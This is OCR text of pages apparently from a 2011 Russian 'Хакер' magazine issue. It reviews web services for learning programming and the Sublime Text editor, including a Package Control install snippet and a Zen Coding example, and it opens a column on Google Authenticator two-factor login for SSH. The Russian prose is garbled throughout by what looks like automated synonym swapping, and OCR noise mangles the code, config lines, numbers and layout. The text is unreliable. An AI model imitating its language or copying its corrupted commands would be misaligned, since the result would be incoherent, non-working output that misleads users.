нонетольковернутьсяксостояниюпослеустановки,ноиустановить

«Маге details>>, твоя милость увидишь архаичный гуманный директор задач, который,

ряд геfгеsh-точек-своеобразных образов, которые не возбраняется

наконец-то, действительно прокачали. Так, каталог задач изумительный вкладке

напасть сверху систему. :Х:

«Processes >> в эту пору убедительно делится получай категории: приложения и фоновые процессы. Как равно прежде, в целях каждого отображается коли­ чество потребляемых ресурсов- процессара да оперативной памяти, но в эту пору сверх того отображаются до этих пор индикаторы дисковой и сеточный активности. Причем ячейки на таблице меняют флора во за­ висимости через интенсивности использования ресурса, посему мгновенно

видно, идеже «гад сидит » :] . Прожорливый судебное дело тогда а не грех не просто выгрузить, же покамест ... перезапустить !просто, однако в качестве кого удобно!]. Утилита <<Performance » как и получила окончательно небывалый внешний облик во стиле Metro Ul, да диаграммы потребления разных ресурсов об эту пору раньше всяких похвал. Впервые появилась супинатор <<Арр

History»: возьми ней отражается статистика используемых тобой при­ ложений. Причем для того каждого подсчитывается суммарное количе­

ство потребления !например, процессарного времени] . Вероятно, эти данные могут являться полезны, дабы оптимизировать эпоха работы

ото аккумулятора !отказавшись через каких-то одиноко требовательных к ресурсам приложений]. Вкладка <<Startup » должна была взору

028

Попр касательно томбуй найди кнопку с целью выключения

ХАКЕР

01/154/2011


n -60 , • • ,

GnhlgSIIIIN_PfoOo....,. • L - 0

,

}

0

~

s •

0

~ ~

CODECADEMY www.codecademy.com Каждый, кто именно изучал некоторый язычишко программирования, знает, каким утомительным

Confirm or Deny

может сделаться прочтение безмалофейный литературы. Хочется испробовать новые запас сведений в этом месте равно сейчас,

"' '· ~·Dooor

., ;r. c,.... ,_o-

малограмотный прыгая туда-обратно через чтения для реализации примеров. Недавно появившийся услуги

", ........... '""' ., ..... 01)'•-111'

Codecademy (академия программирования) пытается ухлопать эту проблему, предлагая

••••••"'"•·-·--~

0)'11018 &.1• •~1 ·-·-··-- ·

... . .." , ••••••• ,тrРС•а.

rон .... , ... ж~J-.. . . ""-•t-н.-· "' •~•

- • -.ot• •••

диалоговый интерфейс к обучения программированию (пока лишь JavaScгipt) . Идея -сделать судебное дело максимально интерактивным . Теория выдается адски маленькими

•1

порциями, же костяк : ее разом предлагается проконтролировать во интерактивной консоли. Пока не поймешь равно малограмотный сделаешь постоянно правильно, служба малограмотный пустит в нижеприведённый шаг. Академия следитза прогреесом равным образом выдаетнаграды подобно Fouгsquaгe . И нтерактивны й уч е бни для nро г р амми рован да ю

SHOWMEDO

Ш Most Viewed Video Tutorials

во

~-;~:..

OpenStreetMap lntroductfon

Leltrn Ojanao: crute а Wlklln

steve

TOI)ICS cover ed

Siddhi lnthis tutone l, I •ntroduce the besics of DJango Ьу wa lking you throughthe

tndud e us{ •.. )

development { ... )

А.

tntrvduttion to using e nd getting st:erted W!th Opt:nStre etМ ap.

0~А

first Jltva

progrllm fn John Montoomery In this ShowMe OO John dernonstrates how tocreate е projecttn Edipse, thenwnte and run ( ]

...

-

~ -

0-zip cornpress files

Oat how to c:ompre ss files us•ng 0·ZIP

showmedo.com

Есть единаче единовластно манера учиться азам(!) программирования, далеко не заглядывая во мануал. Суть хорошо иллюстрирует старуха добрая пословица «Лучше безраздельно однажды увидеть, нежели сто однажды

восчувствовать » . Есть сколько звезд в небе сервисов (вроде peepcode.com alias dest гoyallsoftwa гe . com ), которые за н ебольшуюденежку предоставляютдоступ ко мирово снятым скринкастам, на которых гуру-кодеры делятся решением конкретных задач. Видео вместе с живым человеком -это сейчас не сухая статья, а наглядное видео со комментариями понимающего человека . Что называется , смотри равным образом учись. ShоwМеDо-этотоже четьи-минеи видеокасто на ради программистов, же разви­ вающийся из-за число отсчетов энтузиастов, а в силу того что получи 000% бесплатный. В приоритете Pythoп : только для н егоздесьвыложеноболее600роликовнараз н ые т емы.

В равным образом део ко асты пользу кого ради граммистов

SECURITYTUBE www.secur jtvtube.net Раз олигодон автор сих строк заговорили ради скринкасты, вместе с нашей стороны погрешность малограмотный коснуться профильный pecypc-SecuгityTube . Это, бесспорно, самый большущий агрегатор видео нате тему инфор­ мационной безопасности. Да, туттысячи трешовых роликов, снятых индусами получай кривом

_.,-.

......... _

английском равным образом показывающих, вроде швырнуть Metasploit. Ну равно ладно. Зато после этого но хостится огромное часть видео не без; различных конференций, скринкастов ото известных людей во

fllt~Uc-

области ИБ, сотни демонстраций различных техник, сплоитов, X-Toolz да РоС' относительно в. Естьдаже

~ - -- (Jiкtll• )\)10)

.,

Ро

целые тематические подборки ви д ео, бери п ример, за ауд иту демон пр оводных сетей. Кстати,

,,..,..,29_..... _

...... ....

неравно поискать, в таком случае нетрудно находятся да есть такие наши Vis uaiHack++ :).

Аггрегатор хак -в да део

0 ' r _н _t(tl_t 0 _11 0 _ ,-, _ 11\ " - \ 0 0 - - 01 0 0 0 0 0 t\ \1 1 \\\11 ttttl 1111111\ 1_1~,_,_11 -=11_11_1_1-

v

,_:_,..:._1 '-"-'

[!!!!)

НЦ11 -'11"'~~~~·.

hЬ11CI

0 0 1 1

DJU\If A8otJТ

ASCIIFLOW www.asc jiflow.corn

rJ

~~~~~~~~~

Очень комический сервис. По сути, сие вычитчик блок-схем, однако из одним огромным отличием от, например, Visio . Вместо обычных графических элементов тогда используются исклю­ чительно символы с Аsсii-таблицы. П олучается благотворный Ascii агt. Доступных элементов

0 ••ж•а~ tlooo 1 1-------------------1

'' 1

...,''

-----~·

0 1 1 1

0 1 1 1 1 ·---------·----·----·

____ _L_________ '

___ t t 1 1

временно неграмотный куда много, так ажно существующего набора достаточно, так чтобы очертить слож­ ные блок-схемы . Элементы затем появле н ия получай полотн е н е п р евращаются внеу п равляемый набор символов. Их не возбраняется перемеща т ь, адресовать знакомства меж д у ними из п омо щ ью интерак­

________L_____.

тивных стрелочек. Зачем нужны Аsсii -диаграммы? Д а ни следовать чем:). Нажав получи ко н опку «Ditaa!»,

'

твоя милость получишь уж нормальную графическую схему.

Ре д акция вопль бло к- из х е м

ХАКЕР

01 /154/20JJ

029


PCZONE

Стефан

«Step» Ильин [twitter.com/stepahl

SuЫime Text 0, ИЛИ кунг-фу КОДИНГ ПРАВИЛЬНЫЙ РЕДАКТОР КОДА ДЛЯ ПРОГРАММИСТА Если бы полгода взад меня попросили подсказать

• Форум

вычитчик кода, в таком случае подо

из больш им

n

в количестве

олно ц енного релиза SuЫime

www. suЫ j mete x t .

Nukem

шn.lf=

вторую версию

а подо Мае- знаменитый

TextMate.

Сегодня мы ответил

бы по всем статьям : SuЫime

Text 0. И

никак не

токмо оттого что-то спирт кросс­

limeText:

Полезные плагины :

никак не было, только со каждым

работч ики намертво взялись вслед за основание убийцы

Windows ваш покорный слуга бы предложил Notepad++, около Linux- gedit,

обсужденийя и плагинов про Sub-

Text 0 уже

новым билдом вычитчик обрастает новыми фишками . РазTextMate,

какой-никакой п ользуется бешеной популярностью промежду программистов под Мае, а издревле со всей полнотой никак не обнов ля ется. Поклонники шутят:

Duke

Fогеvег равным образом оный вышел раньше, нежели п ользователям п редложили

TextMate. Вокруг SuЫime Text, напро т ив,

собирается

большое сооб щ ество программистов . Их подумаешь понять: эпизодически привыка­

wboпd . пet/suЫime

е ш ь ко во всех отношениях фишкам, предлагаемых редактором, вместе с т рудом представля­

~

ешь, во вкусе минус них обходился ра н ее. Редактор радует просто всем, а если отчего-то да никак не хватает, так сие без участия труда позволено свести не без; помощью расширений, которых становится постоянно в большинстве случаев да больше, вдругорядь но за счет профессионального сообщества. По иронии судьбы, работает спирт

платформенный, а вследствие этого в чем дело?

неграмотный всего только подина Мае, а почти всеми популярными платформами. И сие одна

сие супер-редактор не без; целой

с главных его киллер-фич .

дюжиной убойных фич .

КРОСС-ПЛАТФОРМЕННОСТЬ Text отродясь бы безграмотный завоева л такого типа популяр­ ности, даже если бы отнюдь не разрабатывался ради Windows, 05 Х да Linux одновре­ Что ни говори, а SuЫime

менно. Работая перед разными системами, пуще безграмотный нужно использо­ вать цельный сафари разных текстовых редакторов, переключаясь с SuЫime

Text 0. Интерфейс подина Мае

одного интерфейса в непохожий да вспоминая горячие фортепьяно [а какой кади н г вне хоткеев?J. Секрет кросс-платформеннысти не вполне кроется в пл атформе разработки, которую выбрали создатели редактора. В это по-китайски поверить, так SuЫime написа н получай

Python'e!

Можно аж

расстараться комбинацию Ctгl- · [тил ьд а!, чтоб во нижней части редактора появилась п олноценная Руthоп-консоль. С через

Python 'a мож н о API,

получай лету приводить поведением редактора: питаться специальные

которые используют соз д атели подключаемых плагинов. За кросс­

пла тформенное успех из Python'oм в глубине разработчики инда не требуют денег. Точнее говоря, просят, только далеко не требуют. В т ечение несгра­ ниченнога триала, SuЫime только лишь время через времени короче напоминать: «Раз литоринх твоя милость

беспричинно издревле пользуешься программой, таким образом быть, убирать вслед зачем отказаться в пользу

$59

долларов его разработчику?>>. Очень не за страх .

УБОЙНЫЙ ИНТЕРФЕЙС Интерфейс SuЫime не грех любить, а мож однако ненавидеть. Он отнюдь не похож ни сверху что такое? другое. Разработчики подо шл да ко этому вопросу творчески,

стараясь продать оный п уть работы из текстом, которые самочки считают правильным. Тут отсутствует тулбаров равно суммарно лишних элементов интерфей­

са. Толь ко шифр равно его уменьшенная для екция [мини-карта! , отображаю-

030

ХАКЕР

01/154/2011


SuЫime

щаяся из правой стороны. Оформление вкладок прямиком подсмотрено

Soda

Text 0,

иначе говоря кунг-фу кодинг

light.suЫirne-theme

у Chгome . Отступы равным образом ограничения блоков изобразительно выделяются едва заметными пунктирными линиями , как бы сие реализовано на

Notepad++.

А во качестве цветовой схемы согласно умолчанию используется брутальный темный вариант, некоторый безграмотный п ременно приелекает подчеркнуть что тех, который

0 (- Sod;~ ~k.subl!mc ~ theme

soda light

• FOLDERS .. Themt - Soda

заглядывает во отражатель твоего ноутбука. Вариантов цветовых схем-

неграмотность тьмущая, доля изо них позаимствована с

TextMate.

з 01 4 01 TABS

003 Soda

s

077 Widget- Soda L lg ht . suЫime-settlngs

По началу

01 (

малограмотный замечаешь каких-то мелких деталей, а со временем начинаешь

придавать значение проработку мелочей . При выделении текста целое пробелы и но архи благостно скругляются. Подсветка синтаксиса понимает, в чем дело?

JavaScгipt, с целью иллюминовать заслуженный код. Всего изо коробки

Sodt~

Llght. subllme- мшng.s

Ught unThtmt

background.png· •, • \eye rG.inner_llarotn": (1, 0 0, "\eyere.opecity": 0.е , "content_tllargin": (3, 0, 0, 0), "teb_over\ep": 04 , •teb_width": 088 , tab_tllin_width ~ : 08 , "teb_height": 08

"17

поддерживается подавляющая языков программирования : С, С++, С#,

08

CSS, О, Егlапg, HTML, Gгoovy, Haskell, HTML, Java, JavaScгipt , LaTeX, Lisp, Lua, Maгkdowп, Matlab, OCaml, Регl , РНР, Pythoп, R, Ruby, SQL, TCL, Textile равно XM L. Никто далеко не мешает со бросать дополнительные схемы другими словами

Soda Ught/Widget- Sod.a

077 Wldget- Sod1. Light.tmTheme

~е-кt:-,-,.-::.. :--:: .. Тh:-,.. --_ 0so< ~a-.t7 so":'d,-u :-:-: ,h:-t/:t--: ,.-,.-:-,_--'

01 12 13 14 15

с целью подеветки Н Т МL-исходника может пенадобиться вновь равно карта чтобы

~

Llg ht .suЬiime-theme

Ught. subllme~thtmt

Soda UghtJWklgtt-

00

знаки табуляции выделяются спецсимволами , а уголочки незаметно,

Soc111

IJ

},

зарисовать свою собственную.

МИНИ-КАРТА КОДА Рассказывая об интерфейсе SuЫime, с нежели столковаться мудрено невыгодный застопорить получи

Альте р н а ти вная равно оч ен ь крюк чн ая т ема

Soda

некоторых ноу-хау. Например , мини-карте заключение , которая, как бы считается

самочки разработчики, показывает исходник от высоты

00 000 футов.

Это

КОМАНДНАЯ ПАНЕЛЬ Textmate, во SuЫime Text глотать

узкая плита не без; правой стороны, в которой выводится масштабируемая

Как равно на

подражание текста. Здесь не мочь узреть непосредственно текст, а з ато махом

укромный инструмент, какой вызывается после карточка

видна строение документа . И разом понятно, какую доза сорца твоя милость ре­

хоткеем Ctгl

дактируешь. Можно позвать во интересующее луг карты- равно SuЫime

ли твоя милость засадить сниппет, призвать макрос, исполнить перевод

покажет нынешний отрезок кода. Кто-то может спросить: а на хренища зто н у жно?

текста [например, переместить однако буквы на ЗАГЛАВНЫЕ!, - целое сие

Лучший путь поплатиться возьми нынешний злоба дня -открыть во редакторе обложка

позволяется предпринять чрез Commaпd

может статься этого: pasteЬiп . com/гaw.php?i=7356гOZM

набираешь начальные символы названия элемента [скажем, сниппета

:1. Кто-то, возможно, равно

командная обшивка . Это супер­

<<Tools>> или + Shift + Р [в Мае: Shift + Commaпd + Pl. Неважно, хочешь

Palette.

Просто нажимаешь хоткей,

наперерез кому/чему подоб н ых наворотов, а непосредственно ми , по мнению ощущением, мини-карта

Tгy/Exceptl- равным образом SuЫime показывает нужные варианты .

всерьёз помогает во навигации объединение документу. д если бы эффектив­

кания-и любые сниппеты твоя милость вставляешь на

ность увеличивается уж на что держи двушник процента , ведь вследствие этого бы равно нет?

03

0 минут привы­

раза быстрее, нежели буде

бы сбивалея да ковырялся мышкой во меню. Причем элементы, выво­ дящиеся бери командной танцевальный шаг н ели, подстраиваются почти характер файлов: с целью

РАЗНЫЕ РЕЖИМЫ ПРОСМОТРА

ру-исходника безвыгодный хорэ лишних сниппетов, сверх того заготовок про Pythoп .

Для тех, который порываться для максимальном у минимализму, лакомиться домашние

плюшки: во п ервую очере д ь, нагрузка « Distгatioп Fгее Mode >> [Shift + F111.

GO ANYTHING

Вот уже идеже далеко не довольно никаких отвлекающих факторов- лишь только твоя милость равным образом код.

Другая жете н ель, об которой отдельные люди редакторы могуттолько мечтать, на­

SuЫime

зывается

Text скрывает ни чуточки

всегда азы редактора равно ОС. Можно

«Go Anythiпg >>.

Название никак не врет: возлюбленная воистину помогает

быть вне фанатизма- заниматься во полноэкранном режиме, кото­

переброситься на документе ко чему приятно . Вызывается горячей клавишей Ctгl

рый вдобавок позволяет эксплуатнуть весь круг пиксел экрана , однако возле этом

+ Р [Мае: Commaпd + Pl. Далее поглощать варианты . Можно накопить заголовок

от что касается х раняя удобные панели редактора, ферма равным образом мини-карту редактора.

файла, дай тебе начинать его . Поиск осуществляется до открытым файлам ,

На защита свободно выводятся небольшую толику файлов одновременно, доста­

файлам проекта, а как и как-то закрытым документам. Результат твоя милость

в точности едва отобрать чрез карта

[«View -7 Layout >>l п одходящую сетку.

При этом переходить в обществе такими панелями дозволительно бог несомненно не без;

получаешь мг н овенно, до мере набора маски, инда если бы на п роекте

000 документов! Набирай во фон

через горячи х клавиш.

Хочешь перевестись для нужной

":le". Вводим

00 строке

00

на текущем файле?

символ"#" равно осуществляем безыскусственный

отыскание сообразно текущему файлу. Причем SuЬiime моментально отображает в списке подходящие подина мерка элементы. Отдельно хочу сконцентрировать

заинтересованность получи и распишись разведка сообразно символам [переменным, функциям, классам!. Для

Pac kage Co ntro l:

сего строку поиска полагается приниматься от символа образом, раскопать

равным образом перебежать для нужной функции- сие близнецы нажатий возьми клавиатуру [кстати,

Package Control: Add Repository Package Control: DJS,,t)!e

Pac~aCJe

Package Control: Drsco\·e: Package Control: Er1,1!Jie Package Control:

к поиска за символам дозволительно враз воспользоваться хоткей Ctгl + Rl. И здесь опять двадцать пять а работают подсказки равно автокомплит. Механизм далеко не исключительно

P,,c~,1C:CS

быстрый, однако равным образом умный. Например, если бы включить tpГcJгf, наша сестра сможем переме­ ститься ко функции

Рзс~мн?

том, аюшки? SuЫime

Package Control: _rs t Packages Package Control:

read_file

открытого файла

text_parser.py,

а

tp:1ee

перенесёт ко 000-й строчке того но файлаl Секрет быстрого п оиска во

Jпstall Pac~,,ge

Text

на фоновом режиме подгружает файлы , которые от

больший вероятностью понадобятся тебе изумительный пора работы.

Rе:·ч~\·е Р.к~.1се

МНОЖЕСТВЕННОЕ ВЫДЕЛЕНИЕ

Package Control: L'pg:."c'e Рас~а~е Package Control: Acic Reposrto:y C:ыtl"el Package Control: Crea te Pac>:age F1!e

Еще одна улетная фича. Суть на том, с целью отнюдь не готовить одним пальцем деланные из­ менения

00 раз,

а свершать

00 изменений

разом. Ты можешьустановить

значок во разных местах страницы- равным образом набираемые символы будут ду­

Package Control:

c~·catc БР 0 (l:-у P.:lC~Jgc ~l!e

Package Control:

L ' p<:н a cie;O\ е:•:.лtе

A!i Pac~.1ges

блироваться вот всех выбранных областях. То, в чем дело? сначала приходилось выполнять не без; через регулярных выражений alias поиска со заменой , теперь что быстрее предпринять после множественное фразировка .

У пра на зеамет ие nа кета ми

ХА КЕР

01 / 054/ 0011

Самый бездействие вариант- просто-напросто пригрести для рукам

Alt [или Commaпd почти Мас'омl

031


PCZONE и далее позвать во тех местах документа, идеже нужно разместить кур­

сор. Или наметить установка строк равно сделать все возможное Shift + Ctгi/Commaпd + L-текст будет наливать глаза получи каждой изо них . Но удобнее общем другой породы режим, по­

зволяющий отредактировать одним пальцем деланные азбука (названия функций, переменных да т.д.l Для сего приходится втиснуть указатель получи нужном слов е и затем порядочно присест оказать давление Coпtгoi/Commaпd +О. Каждое нажатие­ каждое новое <<захваченное >> вникание сего слова. Можно разом по­ ставить добавочный указатель вот всех вхождениях нужного слова. Это

делается нажатием

Alt + FЗ перед виндай равно Ctгi+Commaпd+G по-под маком.

АВТОМАТИЗАЦИЯ Множественное выделение- далеко не беспримерный дорога сэкономить время бери операциях от текстом. К твоим услугам офигительно реализованные функции поиска да замены. Рутину могут автоматизировать макросы ,

которые позволяют вносить образ действий из текстом, а далее их повто­ рять. Есть до этот поры одна похожая опция- снимок последнего действия. Если покопошиться на разблюдник

Edit, в таком случае найдешь пока что мало ли интересных

опций к редактирования. Например, сортировку текста не так — не то наоборот перемешивания строк . Для проектов для С++ убирать фигурка переключения

в кругу хедером равным образом файлом со реали з ацией- Alt-0 (File-Swap Неаdег/

lmplemeпtatioпl . Само собой, доступна концепция сборки . Поддерживают­ ся проекты, написанные на: О, Егlапg, Поиск реализован куда сильно равным образом поддерживает регулярные выражения

Haskell, JavaC, Make, Pythoп , Ruby.

ПОДДЕРЖКА ПЛАГИНОВ Возможности редактора легкопрокачивается после цифирь подключаемы х

плагинов (которые, наравне да самостоятельно редактор, пишутся получи Pythoп'el. Е со ли еще неграмотный этак давненько дополнительных движение кетов было безвыгодный где-то много, ведь

пока что убирать с почему выбрать. Сказывается стремительное развитие редактора равным образом ошеломляющий счастье у программистов, которые рину­ лись претворять в жизнь те фишки, которые они использовали на других

редакторах равно безвыгодный нашли изо коробки на SuЫime

Text. Вместо того с тем

ручной перекачивать исходники аддонов равным образом помещать во нужных дирек­

тория SuЫime'a, удобнее применить специальным менеджером

жете кетов. Он временно недоступен по мнению умолчанию (уверен , который временно), но сам по себе реализован на виде подключаемого батман кета. Чтобы ввести

SuЫime

Package Contгol , нужно начинать внутреннюю кронштейн при­

ложения (напомню , аюшки? сие настоящий Руthоn-интерпретатор) и вставить тама нижеперечисленный сниппет заключение :

import

urlliЬ2,os;pf='Package Control.suЫime-pac kage' ;

ipp=suЫime.iпstalled_packages_path();os.makedirs(ipp)

if

поt

os.path.exists(ipp) else

Nопе;

opeп(os.path.joiп(ipp,pf), ' wb' ).write(urllib2.urlopeп(

'http: /_/ suЫime . wboпd . net/ ' +pf. replace ( ' ' ,

' %2е'

) ) . read ())

После перезапуска приложения на разблюдовка т ы найдешь пункт << Pгefeгences ~

Мультивыделение

ВАЖНЫЕ ДОПОЛНЕНИЯ ДЛЯ

0

SuЫimeCodelntel b jЦ y/a5LzZE

0

Package

сопtгоl >>. Если отобрать на появившемся разблюдник

SUBLIME ТЕХТ

suЫime-text-2-git

bjt .ly/r!na50

0

Clipboard history bjt .Jy/ratKEu

'

Mote Ьit.ly/mPieAO

Автокомпли~реализованныйв

Из коробки SuЫime безвыгодный поддер­

Полезноедополнение,которое

SuЫime по части умолчанию , никак не чрезвычайно

живает интеграцию со системами

в середине SuЫime Text реализует исто­

ровать файлы в соответствии с протоколам sftp/

крут. Подключив таковой плагин, твоя милость по­

контроля версий. Но сие промах

рию изменений для того титьки обмена

ssh2,предоставляямаксимально

лучишь всю мощь технологиия

Code lntelligence через известного Komodo

давноисправили энтузиасты, вы­

(аналог Oittol, позволяя души

прозрачное сольватация вместе с фай­

пустив соответствующие плагины. С

устремиться ко любому с элементов.

лами держи сервере . Имей во виду. в чем дело?

Editoг. Это невыгодный исключительно классический

через сего аддона твоя милость сможешь

Причем на историю попадаюттолько

для того работы ему необходимы бинар­

автокомпли~ноидополнительные

заниматься не без; репазитариями

те сниппеты кода, которые твоя милость занес

ники известного клиента

подсказки близ наборе кода, а вот и все

Git. Аналогичные вкушать равно чтобы SVN, равным образом

с SuЫime Text да всего-навсего соответственно горячей

в духе к поддержания соединения,

удобная мореходство посорцам.

Meгcuгial .

клавише (Ctrl +С) .

приблизительно равным образом генерации ключей .

032

Этот плагин позволяет редакти­

ХАКЕР

PuTTY-

01 / 054/2 011


SuЫime Text 0, alias кунг-фу кодинг

ПОЛЕЗНЫЕ ТИПСЫ Если SuЫime Text неграмотный может предначертать

0

Если твоя милость крупный фанатVi'а, в таком случае тебя осо­

кодировку файла, так дьявол безотчетно

0

выбирает Windows 0252. Конечно,

беннодолженпорадоватьспециальный

«Vintage Mode ». Он vi и все удобные фичи Sublime Text'a, начиная авто­ выделение. Этот власть no умолчанию отключен ,

позволяется выявить обложка заново, принудительна

работа редактора

которые идут изо коробки, но, разве хочешь по неизвестной причине

воеже малограмотный nугать неподготовленных nользовате­

Soda [ естьдве вариации -светлая да темная!. 1. Скачиваем .ziр-архив не без; GitНuЬ-странички про­

лей . Чтобы активировать его, придется показать

сего нужно привнести минимальные изменения

конфиг <<Pгefeгences

во конфиге [Pгefeгences

menu item » равным образом выключить naкeтVinate с списка

-7 File settings Defaultl.

-7 GlobaiSettings -7 Default

игнорируемых [выключенных nа кетов!, поnравив следующую строчку:

"fallback_encoding" : "Western (Windows "ignored_packages" : [ "Vintage" ] 1/ было "ignored_packages" : []

0252)" , И меняем ее, соответственно, на:

Можно поиграться из другими темами,

nозволяетобъединить nривычные команды

выбрав кодировку IFile -7 Reopen with encoding -7 Windows 02511, только сие души надоедает. Правильнее обязать Sublime подбирать по умолчанию малограмотный Windows 0252, а Windows 0251. Для

Находим после этого строчку:

0

На выше- вкус, стандартная содержание оформ­

ления Sublime Text меньше всяких похвал.

// итак

особенного, рекомендую нестандартныетемы

екта I Ьit.ly/niMqТ7 0

0. Распаковываем файлы на каталогТhеmе -7 Soda равно помещаем ее на папку Packages внутри Sublime Text. 3. Далее активируем схему, проnисывая ее во на­ стройках IPгefeгences -7 Useг GlobaiSettingsl. В зависимости оттемы: светлой [Soda Light . sublime-themel alias темной [Soda Daгk. sublime-themel, вставляем нужную строчку в конфиг:

"fallback_encoding": "Cyrillic (Windows 1251)",

Перезаnусти Sublime. Нажми ESC.- если в статус-баре nоявилась знакомая заглавие

"theme" : "Soda Light.sublime-theme"

INSERT MODE, значит, весь заработало :1.

loaded 037

зn~pr;et.з

>>> .1r.-.pc:rt

З'iЗ

>>>

ПРОЕКТ

S'.r'~ .'le:r~.l'.Jn

'2 .6.5

(:r265:790Эб,

Mar 09 0010 ,

01 : 08:26)

/ИSС

'.'.1500 02

Ьн

(Int.el))

Не могу неграмотный пахвалить то, на правах на редакторе реализована учение nроек­ тов. В проекте nолностью бэкаnится обстановка редактора, в волюм числе всегда

J.rr,por-: ur lllb2, l1n~

о..з:рf=-

'Package Control .

.зuЬlнr.е

packaqe ' ;

033, Column 04

Spact~:

измененные равно несохраненные файлы. Если тебе глядишь nо надобилось .1.рр-=зuЫны!. J.n~t;

0

Python внутри. Открываем кронштейн

nереключиться получи прочий nроект, твоя милость ... nросто тама переключаешься. Например, посредством ту а танцевальный шаг н дерево «Goto Anything >>. Переключение проис­ ходит мгновенно. Без лишних лагов равным образом десяток вопросов подобно «Хотите

ли поддержать изменения? >> [потому который совершенно изменения сохраняются ав­ томатически!. Когда твоя милость на ближайший разок откроешь проект, однако довольно на

«lnstall packet >>, так твоя милость увидишь перечень аддонов, доступных для того установ­ ки. Менеджер жете кетов самолично вместе с качает однако файлы равным образом разместит их во нужных директориях- тебе остается чуть избрать пакет.

книга а виде, ась? равным образом возле закрытии. Чего здесь лишние вопросы задавать? :1. Чтобы прибавить файлы во проект, стоит перетянуть их для

сайдбар lпанель слева!. Заметь, безвыгодный отверзать !что сплошь и рядом отнюдь не нужно! фай­ лы, а легко прилинковать нужные изо них, добавив на роспись . Можно

ZEN CODING

пусть даже перетаранить целую директорию- SuЫime

Text обработает однако

Чтобы услыхать всю мощь, которую предоставляют плагины, предлагаю

сразу. Сайдбар- сие не выделяя частностей порядком укромный сбруя интересах изуче­

отсоединить куль Zen Coding. Этот аддон реализует изворотливый средство

ния кода. Если шумнуть по мнению какому-то изо файлов проекта, так вычитчик

ускоренного написания

никак не хорошенького понемножку отворять 053-ю ненужную вкладку, а просто-напросто отобразит ее.

HTML да CSS кода, которым ваш покорный слуга века пользуюсь.

Идея заключается во применении специальной системы аббревиатур да

И на самом деле: на какого хрена нужна вкладка, когда нужно нетрудно хоть сколько-нибудь посмо­

краткой деловой дневник кода, которые согласно определенным правилам «раскрыва­

третья часть в глубине документа? Если но твоя милость хочешь готовить к печати документ,

ются >> во полновесный адрес . Суть выгодно отличается всего делов объяснит пример.

по мнению файлу нужно крикнуть дважды. Это удобно.

div#page>div.logo+ul#navigation>li*З>a

РЕЗЮМИРУЮ Из таких маленьких удобных фенек равно состоит полный Sublime Text.

Наnисав таковой код, нажимаем нехитрое килоом ба получай клавиатуре

lctгl+space, вроде для того автодоnолненияl равно nолучаем нижеуказанный результат:

Если узнать на своем опыте изложить программу во двух слова, в таком случае аз многогрешный бы назвал ее редактором-убийцей. Она работает почти разными системами . Из короб­

ки предоставляет сколько-нибудь уникальных фич . Разработчики победительно

<div id="page" > <div class="logo" ></div> <ul id="navigation" > <li><a href="" ></a></li> <li><a href="" ></a></li> <li><a href="" ></a></li> </ul> </div>

реализуют соль земли фичи с других продуктов, по-черному поддерживая

миграцию [реализовав, например, поддержку бандлов TextMatel. А те фишки, которых программистам далеко не хватает, нередко появляются реализованными во виде плагинов. Успех пугает состоявшихся игроков

рынка. Даже заскучавшие создатели TextMate'a засуетились подо напо­ ром укрепляющегося конкурента, пообещав давно конца возраст выпустить новую ветку своего продукта. Да, у SuЫime принимать есть такие проблемы,

которые могут испугать- позаимствовать несмотря на то бы существенность колупаться в текстовых конфигах. Но мы ранее не без; трудом представляю работу не принимая во внимание сего

Освоив бог простые nравила [ Ьit .l y/pEAGgU I, твоя милость ускоришь разработ­

быстрого редактора вместе с классным интерфейсом, системой сниппетов,

ку разметки на разы. Вот хорошая демонстрирование : Ьit . ly/pipbЗU . Поверь, сие

удобным поиском да панелям

оный самый случай, в некоторых случаях не чета сам согласно себе присест увидеть, нежели сто крата увидеть.

держкой zencoding. Рекомендую.

ХАКЕР

01 / 054/ 0011

«Go То Anything >>, мультиселектом равно под­ I

033


PCZONE КОЛОНКАРЕДАКТОРА

Про двухфа кторную ав т оризацию

дляSSН смело могу д ат ь т ебе параль д л аз многогрешный из во оего акк а унта возьми

моя особа

Gmail.

0.

Пробуем компилировать:

В через симпатия : H dfkлj2 . Я согласно правилам з н аю, ч так твоя милость н е сможешь получить доступ для почте кроме од н оразового ключа , какой генери­

c d goog l e - authe nti cator/libpam/

рует специальное приложениена моем телефоне. И сие вследствие

$ sudo make

двухфакторной авторизации, которую может подсоединить весь круг в настройках своего Gооglе-аккаунта. Но исполь з овать сходственный ин­

Е сли сборочка вывалится вместе с ошибкой, ведь нужно отредактировать

из трумент всего д л автор этих строк входа на

Makefile lпатч позволяется посмотре т ь здесь: Ьit . l y/g7ays JI .

GMail кончено скучно. Поэтому теперича

ваш покорнейший слуга хочу соответственно д ели т ься от тобой, равно как ваш покорнейший слуга прикрутил эту но от амую систему в целях

0. П ереносим устройство pam _ google _ authenti c atoг.so на / lib /secuгit y/, а

без п асного входа держи мои SS Н -серверы.

google-authenticatoг во / usг/Ьin.

Итак, двухфакторная аутен т ификация. Идея заключается во книжка , чтобы сократить ста н дартную схему авторизации « лаги н- движение функция >>

дополнительным одноразовым клю ч ом. П оследний генерируется

0.

специаль н ым мобильным приложе н ием Google Authenticato г (ес т ь

Д алее добавляем строчку во /etc/pam.d/sshd, так чтобы SSН-демон под­ гружа л бери ш РАМ-модуль :

версии с целью iPhone, A n dгo i d, BlackBeг г y l бери основе открытых алгорит­ мов равно спе ц иа льн ого ключа, тот или другой принимать у программы-генератора равным образом

auth r equired pam_google_auth entic at o r. so

Google. Когда стервис п росит ввес т равным образом од н оразовый ключ, н контия н по части ввес т и И обновл мы ем конфиг /etc/ssh/sshd_co nfig:

цифры со экрана те л ефона- равным образом портал осуществлен. Если а ключа нет, то зайти на почту т ы никак не сможешь, п усть д аже у т ебя откуд а-то лакомиться

nрав равно ль н ые л аги н да п ара л ь (например, особа сказал тебе их самолично , как только лишь который со д елал я Н адо сказать, что такое?

Chal lengeRespo nseAuthent ication yes

:1.

Google развивает да дею двухфакторной автори­

0.

зации во п р авиль н ом н а п рав л ении . Исход н ики моби л ьных п риложений

Все, те n ерь всегда подключено. Осталось настроить саму д вухфактор ­ ную авторизацию , сгенерировав тайный ключ:

откры т относительно д оступ н ы, а во качес т ве алгоритмов используются чер н овики

альянса ОАТН (ln itiative fог Open Authe nti cationl, тот или иной поддерживают

$ goog l e - aut hent i cat o r

многие известные ве н дары lв томище чис л е Symantec равно VeгiSignl. Н в рассуждении ась?

https://www . googl e.com/c hart ?chs=200x2ee& .. FBPWIL6PRYLVBQ Yo ur new secret key i s: YO FBPW IL бPRY LVB Q

вновь паче важно: п омимо утилит дл автор этих строк ге н ерации кодов ,

Google предла­

